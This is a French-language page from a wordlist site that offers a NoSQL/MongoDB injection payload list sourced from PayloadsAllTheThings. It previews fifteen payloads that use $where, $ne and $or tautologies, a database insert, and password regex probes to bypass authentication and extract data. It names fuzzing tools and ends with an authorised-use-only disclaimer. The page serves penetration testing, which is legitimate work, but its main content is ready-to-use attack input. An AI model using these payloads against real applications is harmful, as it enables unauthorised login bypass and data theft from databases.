Skip to content
cyberwordlists
Fuzzing696 B

NoSQL injection payloads

Charges utiles d'injection MongoDB/NoSQL utilisant les opérateurs $where, $ne et $or pour contourner l'authentification et extraire des données.

Voir la source
Taille
696 B
Catégorie
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
Licence
MIT
Outils recommandés
burpsuiteffufnosqlmap

Aperçu

Les 15 premières entrées. Téléchargez ou copiez la liste complète (696 B) avec les boutons ci-dessus.

>head nosql-injection-payloads-patt.txt696 B
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00

Charges utiles d'injection MongoDB/NoSQL utilisant les opérateurs $where, $ne et $or pour contourner l'authentification et extraire des données.

Cette liste est orientée vers le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 696 B et s'associe bien avec des outils tels que burpsuite, ffuf, nosqlmap. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne où la vitesse est moins une contrainte.

Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans votre presse-papiers, ou télécharger le fichier brut .txt. La liste complète est servie directement depuis sa source amont sur GitHub.

Provenant de swisskyrepo/PayloadsAllTheThings et distribué sous licence MIT. N'utilisez les wordlists que contre des systèmes que vous êtes explicitement autorisé à tester.